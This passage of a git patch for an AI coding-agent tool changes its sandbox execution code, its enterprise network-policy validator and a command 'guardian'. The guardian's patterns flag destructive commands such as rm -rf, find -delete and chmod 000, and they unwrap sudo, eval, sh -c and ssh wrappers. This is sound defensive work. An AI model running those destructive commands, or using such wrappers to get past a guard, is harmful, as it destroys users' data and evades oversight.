From 2a4c56c858ff1e88e853656c91be66fac8b21295 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" Date: Thu, 11 Jun 2026 23:43:13 +0000 Subject: [PATCH 1/4] chore: sync public mirror from internal --- packages/core/src/sandbox/daytona-sandbox.ts | 272 +++- src/guardian/runner.ts | 775 ++++++++- .../validators/network-policy-validator.ts | 61 +- src/sandbox/docker-sandbox.ts | 108 +- src/sandbox/local-sandbox.ts | 92 +- src/sandbox/native-sandbox.ts | 144 +- src/sandbox/output-capture.ts | 36 + src/sandbox/types.ts | 19 + src/tools/bash.ts | 2 +- src/tools/gh-helpers.ts | 741 ++++++++- src/tools/gh.ts | 21 +- src/utils/url-extractor.ts | 1410 ++++++++++++++++- test/guardian/guardian-runner.test.ts | 220 ++- .../core/daytona-sandbox-edge-cases.test.ts | 19 + test/packages/core/daytona-sandbox.test.ts | 230 +++ test/safety/network-policy-validator.test.ts | 622 +++++++- test/sandbox-integration.test.ts | 18 + test/sandbox/docker-sandbox.test.ts | 150 ++ test/sandbox/local-sandbox.test.ts | 139 ++ .../sandbox/native-sandbox-max-buffer.test.ts | 104 ++ test/sandbox/native-sandbox.test.ts | 21 + test/tools/bash.test.ts | 60 + test/tools/gh-helpers.test.ts | 1059 +++++++++++++ test/tools/gh.test.ts | 93 +- test/utils/url-extractor.test.ts | 447 ++++++ 25 files changed, 6617 insertions(+), 246 deletions(-) create mode 100644 src/sandbox/output-capture.ts create mode 100644 test/sandbox/docker-sandbox.test.ts create mode 100644 test/sandbox/local-sandbox.test.ts create mode 100644 test/sandbox/native-sandbox-max-buffer.test.ts create mode 100644 test/tools/gh-helpers.test.ts diff --git a/packages/core/src/sandbox/daytona-sandbox.ts b/packages/core/src/sandbox/daytona-sandbox.ts index c324bce0b..44fd973fd 100644 --- a/packages/core/src/sandbox/daytona-sandbox.ts +++ b/packages/core/src/sandbox/daytona-sandbox.ts @@ -8,8 +8,13 @@ * Caches the sandbox handle to avoid redundant API calls per operation. */ +import { randomUUID } from "node:crypto"; import { Daytona } from "@daytonaio/sdk"; -import type { ExecResult, Sandbox } from "../../../../src/sandbox/types.js"; +import type { + ExecResult, + ExecWithArgsOptions, + Sandbox, +} from "../../../../src/sandbox/types.js"; export interface DaytonaSandboxConfig { apiKey: string; @@ -22,9 +27,216 @@ type SandboxHandle = Awaited< ReturnType["create"]> >; +type DaytonaSessionCommand = { + cmdId?: string; + exitCode?: number; +}; + +type DaytonaSessionLogs = { + output?: string; + stdout?: string; + stderr?: string; +}; + +type DaytonaProcessApi = SandboxHandle["process"] & { + createSession?: (sessionId: string) => Promise; + deleteSession?: (sessionId: string) => Promise; + executeSessionCommand?: ( + sessionId: string, + req: { + command: string; + runAsync?: boolean; + suppressInputEcho?: boolean; + }, + timeout?: number, + ) => Promise; + getSessionCommand?: ( + sessionId: string, + commandId: string, + ) => Promise; + getSessionCommandLogs?: ( + sessionId: string, + commandId: string, + ) => Promise; +}; + +const SESSION_POLL_MS = 100; +const SESSION_COMMAND_TIMEOUT_MS = 90_000; +const EXEC_OUTPUT_MAX_BUFFER = 40 * 1024; + +function cancelledExecResult(): ExecResult { + return { stdout: "", stderr: "", exitCode: 1 }; +} + +function quoteShellArg(value: string): string { + if (/^[A-Za-z0-9_./:=@%+,-]+$/u.test(value)) { + return value; + } + return `'${value.replace(/'/g, `'\\''`)}'`; +} + +function truncateOutput(value: string, maxBuffer?: number): string { + if (maxBuffer === undefined) { + return value; + } + const bytes = Buffer.from(value); + if (bytes.length <= maxBuffer) { + return value; + } + return bytes.subarray(0, maxBuffer).toString("utf-8"); +} + +function sleep(ms: number): Promise { + return new Promise((resolve) => setTimeout(resolve, ms)); +} + export class DaytonaSandbox implements Sandbox { private constructor(private handle: SandboxHandle) {} + private hasSessionApi(processApi: DaytonaProcessApi): boolean { + return !!( + processApi.createSession && + processApi.deleteSession && + processApi.executeSessionCommand && + processApi.getSessionCommand && + processApi.getSessionCommandLogs + ); + } + + private buildShellCommand( + command: string, + cwd?: string, + env?: Record, + ): string { + let fullCommand = command; + if (env && Object.keys(env).length > 0) { + const envPrefix = Object.entries(env) + .map(([k, v]) => { + if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(k)) { + throw new Error(`Invalid environment variable name: ${k}`); + } + const escaped = v.replace(/'/g, "'\\''"); + return `${k}='${escaped}'`; + }) + .join(" "); + fullCommand = `${envPrefix} ${fullCommand}`; + } + if (cwd) { + const escapedCwd = cwd.replace(/'/g, "'\\''"); + fullCommand = `cd '${escapedCwd}' && ${fullCommand}`; + } + return fullCommand; + } + + private async execWithSession( + command: string, + options: ExecWithArgsOptions = {}, + ): Promise { + const processApi = this.handle.process as DaytonaProcessApi; + if (!this.hasSessionApi(processApi)) { + if (options.signal?.aborted) { + return cancelledExecResult(); + } + if (options.signal) { + throw new Error( + "Daytona abortable execution requires session API support", + ); + } + const result = await processApi.executeCommand(command); + return { + stdout: truncateOutput(result.result, options.maxBuffer), + stderr: "", + exitCode: result.exitCode, + }; + } + + const sessionId = `maestro-exec-${randomUUID()}`; + let sessionDeleted = false; + let sessionDeletePromise: Promise | undefined; + const deleteSession = async (): Promise => { + if (sessionDeleted) { + return; + } + if (sessionDeletePromise) { + await sessionDeletePromise; + if (sessionDeleted) { + return; + } + } + sessionDeletePromise = (async () => { + try { + await processApi.deleteSession!(sessionId); + sessionDeleted = true; + } catch { + // The session may not exist yet during setup cancellation. + } finally { + sessionDeletePromise = undefined; + } + })(); + await sessionDeletePromise; + }; + const abortSession = (): void => { + void deleteSession(); + }; + options.signal?.addEventListener("abort", abortSession, { once: true }); + + try { + if (options.signal?.aborted) { + return cancelledExecResult(); + } + await processApi.createSession(sessionId); + if (options.signal?.aborted) { + return cancelledExecResult(); + } + + const response = await processApi.executeSessionCommand(sessionId, { + command, + runAsync: true, + suppressInputEcho: true, + }); + if (!response.cmdId) { + throw new Error("Daytona session command did not return a command id"); + } + + const startedAt = Date.now(); + while (!options.signal?.aborted) { + if (Date.now() - startedAt >= SESSION_COMMAND_TIMEOUT_MS) { + throw new Error("Daytona session command timed out"); + } + const commandState = await processApi.getSessionCommand( + sessionId, + response.cmdId, + ); + if (options.signal?.aborted) { + return cancelledExecResult(); + } + if (typeof commandState.exitCode === "number") { + const logs = await processApi.getSessionCommandLogs( + sessionId, + response.cmdId, + ); + if (options.signal?.aborted) { + return cancelledExecResult(); + } + return { + stdout: truncateOutput( + logs.stdout ?? logs.output ?? "", + options.maxBuffer, + ), + stderr: truncateOutput(logs.stderr ?? "", options.maxBuffer), + exitCode: commandState.exitCode, + }; + } + await sleep(SESSION_POLL_MS); + } + + return cancelledExecResult(); + } finally { + options.signal?.removeEventListener("abort", abortSession); + await deleteSession(); + } + } + /** * Create a new Daytona sandbox. This is async because it provisions * a remote sandbox environment. @@ -49,28 +261,21 @@ export class DaytonaSandbox implements Sandbox { command: string, cwd?: string, env?: Record, + signal?: AbortSignal, ): Promise { try { - // Build command with env vars and cwd if provided - let fullCommand = command; - if (env && Object.keys(env).length > 0) { - const envPrefix = Object.entries(env) - .map(([k, v]) => { - if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(k)) { - throw new Error(`Invalid environment variable name: ${k}`); - } - // Use single quotes to prevent shell interpretation - const escaped = v.replace(/'/g, "'\\''"); - return `${k}='${escaped}'`; - }) - .join(" "); - fullCommand = `${envPrefix} ${fullCommand}`; + const fullCommand = this.buildShellCommand(command, cwd, env); + const processApi = this.handle.process as DaytonaProcessApi; + if (signal?.aborted) { + return cancelledExecResult(); } - if (cwd) { - const escapedCwd = cwd.replace(/'/g, "'\\''"); - fullCommand = `cd '${escapedCwd}' && ${fullCommand}`; + if (signal && this.hasSessionApi(processApi)) { + return await this.execWithSession(fullCommand, { + signal, + maxBuffer: EXEC_OUTPUT_MAX_BUFFER, + }); } - const result = await this.handle.process.executeCommand(fullCommand); + const result = await processApi.executeCommand(fullCommand); return { stdout: result.result, stderr: "", @@ -85,6 +290,35 @@ export class DaytonaSandbox implements Sandbox { } } + async execWithArgs( + command: string, + args: string[] = [], + options: ExecWithArgsOptions = {}, + ): Promise { + try { + const fullCommand = this.buildShellCommand( + [command, ...args].map(quoteShellArg).join(" "), + options.cwd, + options.env, + ); + if (options.signal) { + return await this.execWithSession(fullCommand, options); + } + const result = await this.handle.process.executeCommand(fullCommand); + return { + stdout: truncateOutput(result.result, options.maxBuffer), + stderr: "", + exitCode: result.exitCode, + }; + } catch (err) { + return { + stdout: "", + stderr: err instanceof Error ? err.message : String(err), + exitCode: 1, + }; + } + } + async readFile(path: string): Promise { const content = await this.handle.fs.downloadFile(path); return typeof content === "string" ? content : content.toString("utf-8"); diff --git a/src/guardian/runner.ts b/src/guardian/runner.ts index 8f8729392..a287549a7 100644 --- a/src/guardian/runner.ts +++ b/src/guardian/runner.ts @@ -10,7 +10,7 @@ import { writeFileSync, } from "node:fs"; import os from "node:os"; -import { dirname, join, resolve } from "node:path"; +import { basename, dirname, join, resolve } from "node:path"; import { resolveGuardianConfig } from "./config.js"; import { loadGuardianState, recordGuardianRun } from "./state.js"; import { DEFAULT_EXCLUDES } from "./types.js"; @@ -844,21 +844,39 @@ export function shouldGuardCommand(command: string): { shouldGuard: boolean; trigger: string | null; } { - const inlineDisable = /MAESTRO_GUARDIAN\s*=\s*(0|false|off|no)/i; - if (inlineDisable.test(command)) { - return { shouldGuard: false, trigger: null }; + const commandSequences = tokenizeGuardianCommand(command); + const normalizedSequences = + normalizeGuardianCommandSequences(commandSequences); + + const trigger = findGuardTriggerInSequences(normalizedSequences); + if (trigger) { + return { shouldGuard: true, trigger }; + } + + const nestedTrigger = findNestedGuardTrigger(command); + if (nestedTrigger) { + return { shouldGuard: true, trigger: nestedTrigger }; } - const gitMatch = command.match(/\bgit\s+(commit|push)\b/i); - if (gitMatch?.[1]) { - return { shouldGuard: true, trigger: `git ${gitMatch[1].toLowerCase()}` }; + + return { shouldGuard: false, trigger: null }; +} + +function findGuardTriggerInSequences( + normalizedSequences: string[][], +): string | null { + for (const tokens of normalizedSequences) { + const gitSubcommand = findGitSubcommand(tokens); + if (gitSubcommand === "commit" || gitSubcommand === "push") { + return `git ${gitSubcommand}`; + } + + const rmTrigger = findRmTrigger(tokens); + if (rmTrigger) { + return rmTrigger; + } } const destructivePatterns: Array<{ regex: RegExp; label: string }> = [ - { regex: /\brm\s+-rf\b/i, label: "rm -rf" }, - { - regex: /\brm\s+(?:-[a-z]*r[a-z]*\b|--recursive\b)/i, - label: "rm -r", - }, { regex: /\bfind\s+[^\n]*-delete\b/i, label: "find -delete" }, { regex: /\bchmod\s+0{3,4}\b/i, label: "chmod 000" }, { regex: /\bchown\b[^\n]*\broot\b/i, label: "chown root" }, @@ -867,13 +885,738 @@ export function shouldGuardCommand(command: string): { { regex: /\btruncate\s+-s\s+0\b/i, label: "truncate -s 0" }, ]; - for (const pattern of destructivePatterns) { - if (pattern.regex.test(command)) { - return { shouldGuard: true, trigger: pattern.label }; + for (const tokens of normalizedSequences) { + const parsedCommand = tokens.join(" "); + for (const pattern of destructivePatterns) { + if (pattern.regex.test(parsedCommand)) { + return pattern.label; + } } } - return { shouldGuard: false, trigger: null }; + return null; +} + +function findNestedGuardTrigger(command: string): string | null { + const pending = [ + ...extractShellSubstitutions(command), + ...extractNestedInlineGuardianCommands(command), + ]; + const seen = new Set(); + + while (pending.length > 0) { + const nestedCommand = pending.pop(); + if (!nestedCommand || seen.has(nestedCommand)) { + continue; + } + seen.add(nestedCommand); + + const normalizedSequences = normalizeGuardianCommandSequences( + tokenizeGuardianCommand(nestedCommand), + ); + const trigger = findGuardTriggerInSequences(normalizedSequences); + if (trigger) { + return trigger; + } + + pending.push(...extractShellSubstitutions(nestedCommand)); + pending.push(...extractNestedInlineGuardianCommands(nestedCommand)); + } + return null; +} + +function extractNestedInlineGuardianCommands(command: string): string[] { + return tokenizeGuardianCommand(command).flatMap((tokens) => { + const normalized = normalizeGuardianCommandTokens(tokens); + if (normalized.length === 0) { + return []; + } + return [ + ...extractInlineShellCommands(normalized), + ...extractEvalCommands(normalized), + ]; + }); +} + +function extractShellSubstitutions(command: string): string[] { + const substitutions: string[] = []; + let quote: "'" | '"' | null = null; + + for (let index = 0; index < command.length; index += 1) { + const char = command[index]; + if (char === "\\") { + index += 1; + continue; + } + if (quote === "'") { + if (char === "'") { + quote = null; + } + continue; + } + if (quote === '"' && char === '"') { + quote = null; + continue; + } + if (!quote && char === "'") { + quote = char; + continue; + } + if (!quote && char === '"') { + quote = char; + continue; + } + if (char === "`") { + const end = findBacktickEnd(command, index + 1); + if (end !== -1) { + substitutions.push(command.slice(index + 1, end)); + index = end; + } + continue; + } + if (char === "$" && command[index + 1] === "(") { + const end = findCommandSubstitutionEnd(command, index + 2); + if (end !== -1) { + substitutions.push(command.slice(index + 2, end)); + index = end; + } + continue; + } + if ((char === "<" || char === ">") && command[index + 1] === "(") { + const end = findCommandSubstitutionEnd(command, index + 2); + if (end !== -1) { + substitutions.push(command.slice(index + 2, end)); + index = end; + } + } + } + + return substitutions; +} + +function findBacktickEnd(command: string, start: number): number { + for (let index = start; index < command.length; index += 1) { + if (command[index] === "\\") { + index += 1; + continue; + } + if (command[index] === "`") { + return index; + } + } + return -1; +} + +function findCommandSubstitutionEnd(command: string, start: number): number { + let depth = 1; + let quote: "'" | '"' | "`" | null = null; + let escaped = false; + + for (let index = start; index < command.length; index += 1) { + const char = command[index]; + if (char === undefined) { + continue; + } + + if (escaped) { + escaped = false; + continue; + } + if (char === "\\") { + escaped = true; + continue; + } + if (quote) { + if (char === quote) { + quote = null; + } + continue; + } + if (char === "'" || char === '"' || char === "`") { + quote = char; + continue; + } + if (char === "(") { + depth += 1; + continue; + } + if (char === ")") { + depth -= 1; + if (depth === 0) { + return index; + } + } + } + + return -1; +} + +function tokenizeGuardianCommand(command: string): string[][] { + const sequences: string[][] = []; + let tokens: string[] = []; + let current = ""; + let quote: "'" | '"' | null = null; + let escaped = false; + + const pushToken = () => { + if (current.length > 0) { + tokens.push(current); + current = ""; + } + }; + const pushSequence = () => { + pushToken(); + if (tokens.length > 0) { + sequences.push(tokens); + tokens = []; + } + }; + + for (let index = 0; index < command.length; index += 1) { + const char = command[index]; + if (char === undefined) { + continue; + } + + if (escaped) { + current += char; + escaped = false; + continue; + } + + if (quote) { + if (quote === '"' && char === "\\") { + escaped = true; + continue; + } + if (char === quote) { + quote = null; + continue; + } + current += char; + continue; + } + + if (char === "\\") { + escaped = true; + continue; + } + if (char === "'" || char === '"') { + if (current.length > 0) { + pushToken(); + } + quote = char; + continue; + } + if (char === "#" && current.length === 0) { + while (index + 1 < command.length && command[index + 1] !== "\n") { + index += 1; + } + continue; + } + if (/\s/.test(char)) { + pushToken(); + continue; + } + if (char === ";" || char === "|" || char === "&") { + pushSequence(); + if (command[index + 1] === char) { + index += 1; + } + continue; + } + + current += char; + } + + pushSequence(); + return sequences; +} + +function normalizeGuardianCommandSequences( + commandSequences: string[][], +): string[][] { + return commandSequences.flatMap((tokens) => + expandGuardianCommandTokens(tokens), + ); +} + +function expandGuardianCommandTokens(tokens: string[]): string[][] { + const normalized = normalizeGuardianCommandTokens(tokens); + if (normalized.length === 0) { + return []; + } + + const inlineCommands = [ + ...extractInlineShellCommands(normalized), + ...extractEvalCommands(normalized), + ...extractRemoteShellCommands(normalized), + ...extractCompoundGuardianCommands(normalized), + ]; + return [ + normalized, + ...inlineCommands.flatMap((command) => + expandGuardianInlineCommand(command), + ), + ]; +} + +function expandGuardianInlineCommand( + command: string, + seen = new Set(), +): string[][] { + if (seen.has(command)) { + return []; + } + seen.add(command); + + return [ + ...normalizeGuardianCommandSequences(tokenizeGuardianCommand(command)), + ...extractShellSubstitutions(command).flatMap((nestedCommand) => + expandGuardianInlineCommand(nestedCommand, seen), + ), + ]; +} + +function normalizeGuardianCommandTokens(tokens: string[]): string[] { + let normalized = tokens.slice(); + let changed = true; + + while (changed) { + changed = false; + normalized = stripLeadingAssignments(normalized); + if (normalized.length === 0) { + return normalized; + } + + const command = normalized[0]?.toLowerCase(); + if (command === "command") { + normalized = unwrapCommandBuiltin(normalized); + changed = true; + continue; + } + if (command === "nohup" || command === "time") { + normalized = + normalized[1] === "--" ? normalized.slice(2) : normalized.slice(1); + changed = true; + continue; + } + if (command === "sudo") { + normalized = unwrapSudoCommand(normalized); + changed = true; + continue; + } + if (command === "env") { + normalized = unwrapEnvCommand(normalized); + changed = true; + } + } + + return normalized; +} + +function unwrapCommandBuiltin(tokens: string[]): string[] { + let index = 1; + while (index < tokens.length) { + const token = tokens[index]; + if (token === "--") { + index += 1; + break; + } + if (token === "-p") { + index += 1; + continue; + } + break; + } + return tokens.slice(index); +} + +function stripLeadingAssignments(tokens: string[]): string[] { + const firstCommandIndex = tokens.findIndex( + (token) => !isEnvAssignment(token), + ); + return firstCommandIndex === -1 ? [] : tokens.slice(firstCommandIndex); +} + +function unwrapSudoCommand(tokens: string[]): string[] { + let index = 1; + while (index < tokens.length) { + const token = tokens[index]; + if (token === "--") { + index += 1; + break; + } + if (!token?.startsWith("-")) { + break; + } + index += ["-C", "-g", "-h", "-p", "-u"].includes(token) ? 2 : 1; + } + return tokens.slice(index); +} + +function unwrapEnvCommand(tokens: string[]): string[] { + let index = 1; + while (index < tokens.length) { + const token = tokens[index]; + if (!token) { + break; + } + if (isEnvAssignment(token)) { + index += 1; + continue; + } + if (token === "-u" || token === "--unset") { + index += 2; + continue; + } + if (token.startsWith("--unset=") || token === "-i" || token === "-0") { + index += 1; + continue; + } + if (token.startsWith("-")) { + index += 1; + continue; + } + break; + } + return tokens.slice(index); +} + +function isEnvAssignment(token: string): boolean { + return /^[A-Za-z_][A-Za-z0-9_]*=.*/.test(token); +} + +const INLINE_SHELL_COMMANDS = new Set([ + "ash", + "bash", + "dash", + "fish", + "ksh", + "sh", + "su", + "zsh", +]); + +const REMOTE_SHELL_COMMANDS = new Set(["ssh"]); +const SSH_OPTIONS_WITH_VALUES = new Set([ + "-b", + "-c", + "-D", + "-E", + "-F", + "-i", + "-J", + "-L", + "-l", + "-m", + "-O", + "-o", + "-p", + "-Q", + "-R", + "-S", + "-W", + "-w", +]); + +const SHELL_OPTIONS_WITH_VALUES = new Set([ + "-O", + "+O", + "-o", + "--init-file", + "--rcfile", + "-init-file", + "-rcfile", +]); +const SHELL_COMBINABLE_COMMAND_STRING_FLAGS = new Set([ + "a", + "b", + "e", + "f", + "h", + "i", + "k", + "l", + "m", + "n", + "p", + "r", + "s", + "t", + "u", + "v", + "x", + "B", + "C", + "E", + "H", + "P", + "T", +]); + +function stripGuardianGrouping(token: string): string { + return token.replace(/^[({]+/, "").replace(/[)}]+$/, ""); +} + +function guardianCommandBasename(token: string): string { + const stripped = stripGuardianGrouping(token); + if (stripped.length === 0) { + return ""; + } + const normalized = basename(stripped).split(/[/\\]/).pop() ?? ""; + return normalized.toLowerCase().replace(/\.exe$/, ""); +} + +function extractInlineShellCommands(tokens: string[]): string[] { + const commands: string[] = []; + + for (let commandIndex = 0; commandIndex < tokens.length; commandIndex += 1) { + const shell = guardianCommandBasename(tokens[commandIndex] ?? ""); + if (!INLINE_SHELL_COMMANDS.has(shell)) { + continue; + } + const scanPastNonOptions = shell === "su"; + + for (let index = commandIndex + 1; index < tokens.length - 1; index += 1) { + const token = stripGuardianGrouping(tokens[index] ?? ""); + if (token.length === 0) { + continue; + } + if (token === "--") { + break; + } + if (isShellCommandStringFlag(token)) { + let commandStringIndex = index + 1; + while (tokens[commandStringIndex] === "--") { + commandStringIndex += 1; + } + const inlineCommand = tokens[commandStringIndex]; + if (inlineCommand) { + commands.push(inlineCommand); + } + break; + } + if (SHELL_OPTIONS_WITH_VALUES.has(token)) { + index += 1; + continue; + } + if (token.startsWith("-") || token.startsWith("+")) { + continue; + } + if (scanPastNonOptions) { + continue; + } + break; + } + } + + return commands; +} + +function isShellCommandStringFlag(token: string): boolean { + if (token === "-c") { + return true; + } + if (!/^-([A-Za-z]+)$/.test(token)) { + return false; + } + const flags = [...token.slice(1)]; + const commandStringFlagIndex = flags.indexOf("c"); + if (commandStringFlagIndex === -1) { + return false; + } + return flags.every( + (flag, index) => + (index === commandStringFlagIndex && flag === "c") || + SHELL_COMBINABLE_COMMAND_STRING_FLAGS.has(flag), + ); +} + +function extractEvalCommands(tokens: string[]): string[] { + if (guardianCommandBasename(tokens[0] ?? "") !== "eval") { + return []; + } + + const command = tokens + .slice(1) + .filter((token) => token.length > 0) + .join(" "); + return command ? [command] : []; +} + +function extractRemoteShellCommands(tokens: string[]): string[] { + const commands: string[] = []; + + for (let commandIndex = 0; commandIndex < tokens.length; commandIndex += 1) { + const command = guardianCommandBasename(tokens[commandIndex] ?? ""); + if (!REMOTE_SHELL_COMMANDS.has(command)) { + continue; + } + + let index = commandIndex + 1; + while (index < tokens.length) { + const token = stripGuardianGrouping(tokens[index] ?? ""); + if (!token) { + index += 1; + continue; + } + if (token === "--") { + index += 1; + break; + } + if (SSH_OPTIONS_WITH_VALUES.has(token)) { + index += 2; + continue; + } + if (SSH_OPTIONS_WITH_VALUES.has(token.slice(0, 2))) { + index += 1; + continue; + } + if (token.startsWith("-")) { + index += 1; + continue; + } + index += 1; + break; + } + + const remoteCommand = tokens + .slice(index) + .filter((token) => token.trim().length > 0) + .join(" "); + if (remoteCommand) { + commands.push(remoteCommand); + } + } + + return commands; +} + +function extractCompoundGuardianCommands(tokens: string[]): string[] { + return tokens.filter((token) => isCompoundGuardianToken(token)); +} + +function isCompoundGuardianToken(token: string): boolean { + if (token.length === 0) { + return false; + } + const trimmed = token.trimStart(); + if ( + trimmed.startsWith("$(") || + trimmed.startsWith("`") || + trimmed.startsWith("<(") || + trimmed.startsWith(">(") + ) { + return false; + } + const sequences = tokenizeGuardianCommand(token); + if (sequences.length !== 1) { + return true; + } + const [sequence] = sequences; + return sequence?.length !== 1 || sequence[0] !== token; +} + +function findGitSubcommand(tokens: string[]): string | null { + for (let commandIndex = 0; commandIndex < tokens.length; commandIndex += 1) { + if (guardianCommandBasename(tokens[commandIndex] ?? "") !== "git") { + continue; + } + const subcommand = findGitSubcommandFrom(tokens, commandIndex); + if (subcommand === "commit" || subcommand === "push") { + return subcommand; + } + } + return null; +} + +function findGitSubcommandFrom( + tokens: string[], + commandIndex: number, +): string | null { + for (let index = commandIndex + 1; index < tokens.length; index += 1) { + const token = stripGuardianGrouping(tokens[index] ?? ""); + if (!token) { + continue; + } + if (GIT_OPTIONS_WITH_VALUES.has(token)) { + index += 1; + continue; + } + if ( + GIT_OPTIONS_WITH_OPTIONAL_INLINE_VALUES.some((option) => + token.startsWith(`${option}=`), + ) + ) { + continue; + } + if (token.startsWith("-")) { + continue; + } + return token.toLowerCase(); + } + + return null; +} + +const GIT_OPTIONS_WITH_VALUES = new Set([ + "-C", + "-c", + "--config-env", + "--exec-path", + "--git-dir", + "--namespace", + "--work-tree", +]); + +const GIT_OPTIONS_WITH_OPTIONAL_INLINE_VALUES = [ + "--config-env", + "--exec-path", + "--git-dir", + "--namespace", + "--work-tree", +]; + +function findRmTrigger(tokens: string[]): string | null { + for (let index = 0; index < tokens.length; index += 1) { + if (guardianCommandBasename(tokens[index] ?? "") !== "rm") { + continue; + } + const trigger = findRmTriggerFromArgs(tokens.slice(index + 1)); + if (trigger) { + return trigger; + } + } + return null; +} + +function findRmTriggerFromArgs(args: string[]): string | null { + let force = false; + let recursive = false; + for (const token of args) { + if (token === "--") { + break; + } + if (token === "--force") { + force = true; + continue; + } + if (token === "--recursive") { + recursive = true; + continue; + } + if (/^-[^-]/.test(token)) { + const flags = token.slice(1); + force ||= flags.includes("f"); + recursive ||= flags.includes("r") || flags.includes("R"); + } + } + + if (!recursive) { + return null; + } + return force ? "rm -rf" : "rm -r"; } export async function runGuardian( diff --git a/src/safety/validators/network-policy-validator.ts b/src/safety/validators/network-policy-validator.ts index d14fe2f8b..d642a548e 100644 --- a/src/safety/validators/network-policy-validator.ts +++ b/src/safety/validators/network-policy-validator.ts @@ -1,4 +1,5 @@ import { lookup } from "node:dns/promises"; +import { isIP as netIsIP } from "node:net"; import type { ActionApprovalContext } from "../../agent/action-approval.js"; import { isLocalhostAlias, @@ -10,6 +11,7 @@ import { import { extractUrlsFromShellCommand, extractUrlsFromValue, + findOpaqueNetworkShellCommand, } from "../../utils/url-extractor.js"; import type { EnterprisePolicy } from "../policy.js"; @@ -41,24 +43,49 @@ function getStringArg( return typeof value === "string" ? value : null; } +function normalizePolicyHost(host: string): string { + return host + .toLowerCase() + .replace(/^\[|\]$/g, "") + .replace(/\.+$/, ""); +} + +function hostMatchesPolicyEntry(host: string, policyHost: string): boolean { + const normalizedPolicyHost = normalizePolicyHost(policyHost); + return ( + host === normalizedPolicyHost || host.endsWith(`.${normalizedPolicyHost}`) + ); +} + /** * Extract URLs from tool arguments (recursively checks nested objects) - * Also extracts URLs from curl/wget commands in bash. + * Also extracts statically visible network targets from bash commands. */ export function extractPolicyUrls(context: ActionApprovalContext): string[] { const args = getArgsObject(context); if (!args) return []; - const urls = extractUrlsFromValue(args); - if (context.toolName === "bash" || context.toolName === "background_tasks") { - const command = getStringArg(context, "command"); - if (command) { + const { command, ...nonCommandArgs } = args; + const urls = extractUrlsFromValue(nonCommandArgs); + if (typeof command === "string") { urls.push(...extractUrlsFromShellCommand(command)); } + return urls; } - return urls; + return extractUrlsFromValue(args); +} + +function getOpaqueNetworkCommand( + context: ActionApprovalContext, +): string | null { + if (context.toolName !== "bash" && context.toolName !== "background_tasks") { + return null; + } + + const command = getStringArg(context, "command"); + return command ? findOpaqueNetworkShellCommand(command) : null; } /** @@ -70,14 +97,12 @@ export async function checkNetworkRestrictionsDetailed( ): Promise { try { const parsed = new URL(url); - const host = parsed.hostname.toLowerCase(); - - const normalizedHost = host.replace(/^\[|\]$/g, ""); + const host = normalizePolicyHost(parsed.hostname); + const normalizedHost = host; if (network.blockedHosts?.length) { for (const blockedHost of network.blockedHosts) { - const lowerBlocked = blockedHost.toLowerCase(); - if (host === lowerBlocked || host.endsWith(`.${lowerBlocked}`)) { + if (hostMatchesPolicyEntry(host, blockedHost)) { return { allowed: false, reason: `Host "${host}" is blocked by enterprise policy.`, @@ -100,8 +125,7 @@ export async function checkNetworkRestrictionsDetailed( }; } const isAllowed = network.allowedHosts.some((allowedHost) => { - const lowerAllowed = allowedHost.toLowerCase(); - return host === lowerAllowed || host.endsWith(`.${lowerAllowed}`); + return hostMatchesPolicyEntry(host, allowedHost); }); if (!isAllowed) { return { @@ -118,7 +142,7 @@ export async function checkNetworkRestrictionsDetailed( const isIP = parseIPv4(normalizedHost) !== null || parseIPv4MappedHex(normalizedHost) !== null || - normalizedHost.includes(":"); + netIsIP(normalizedHost) !== 0; if (!isIP) { try { @@ -195,5 +219,14 @@ export async function checkNetworkPolicy( return check; } } + + const opaqueNetworkCommand = getOpaqueNetworkCommand(context); + if (opaqueNetworkCommand) { + return { + allowed: false, + reason: `Network-capable command "${opaqueNetworkCommand}" does not expose a statically validatable host for enterprise network policy.`, + }; + } + return { allowed: true }; } diff --git a/src/sandbox/docker-sandbox.ts b/src/sandbox/docker-sandbox.ts index cc89baebe..7f0c7fa46 100644 --- a/src/sandbox/docker-sandbox.ts +++ b/src/sandbox/docker-sandbox.ts @@ -53,15 +53,39 @@ * @module sandbox/docker-sandbox */ -import { exec } from "node:child_process"; +import { exec, spawn } from "node:child_process"; import { randomUUID } from "node:crypto"; import { promisify } from "node:util"; import { createLogger } from "../utils/logger.js"; -import type { ExecResult, Sandbox } from "./types.js"; +import { + appendCapturedOutput, + createOutputCapture, + finalizeCapturedOutput, +} from "./output-capture.js"; +import type { ExecResult, ExecWithArgsOptions, Sandbox } from "./types.js"; const logger = createLogger("sandbox:docker"); const execAsync = promisify(exec); +const EXEC_WITH_ARGS_MAX_BUFFER = 1024 * 1024; +const DOCKER_ABORTABLE_EXEC_WRAPPER = ` +child_pid="" +on_signal() { + if [ -n "$child_pid" ]; then + kill -TERM -- "-$child_pid" 2>/dev/null || kill -TERM "$child_pid" 2>/dev/null || true + wait "$child_pid" 2>/dev/null || true + fi + exit 143 +} +trap on_signal TERM INT HUP +if command -v setsid >/dev/null 2>&1; then + setsid "$@" & +else + "$@" & +fi +child_pid=$! +wait "$child_pid" +`.trim(); export interface DockerSandboxConfig { image?: string; @@ -107,6 +131,7 @@ export class DockerSandbox implements Sandbox { command: string, cwd?: string, env?: Record, + signal?: AbortSignal, ): Promise { const id = await this.ensureContainer(); @@ -122,7 +147,7 @@ export class DockerSandbox implements Sandbox { dockerCmd += ` ${id} sh -c "${command.replace(/"/g, '\\"')}"`; try { - const { stdout, stderr } = await execAsync(dockerCmd); + const { stdout, stderr } = await execAsync(dockerCmd, { signal }); return { stdout, stderr, exitCode: 0 }; } catch (error: unknown) { const execError = error as { @@ -138,6 +163,83 @@ export class DockerSandbox implements Sandbox { } } + async execWithArgs( + command: string, + args: string[] = [], + options: ExecWithArgsOptions = {}, + ): Promise { + try { + const id = await this.ensureContainer(); + const dockerArgs = ["exec"]; + if (options.cwd) { + dockerArgs.push("-w", options.cwd); + } + if (options.env) { + for (const [key, value] of Object.entries(options.env)) { + dockerArgs.push("-e", `${key}=${value}`); + } + } + if (options.signal) { + dockerArgs.push( + id, + "sh", + "-lc", + DOCKER_ABORTABLE_EXEC_WRAPPER, + "sh", + command, + ...args, + ); + } else { + dockerArgs.push(id, command, ...args); + } + + return await new Promise((resolve, reject) => { + const child = spawn("docker", dockerArgs, { + signal: options.signal, + stdio: ["ignore", "pipe", "pipe"], + }); + const maxBuffer = options.maxBuffer ?? EXEC_WITH_ARGS_MAX_BUFFER; + const stdoutCapture = createOutputCapture(); + const 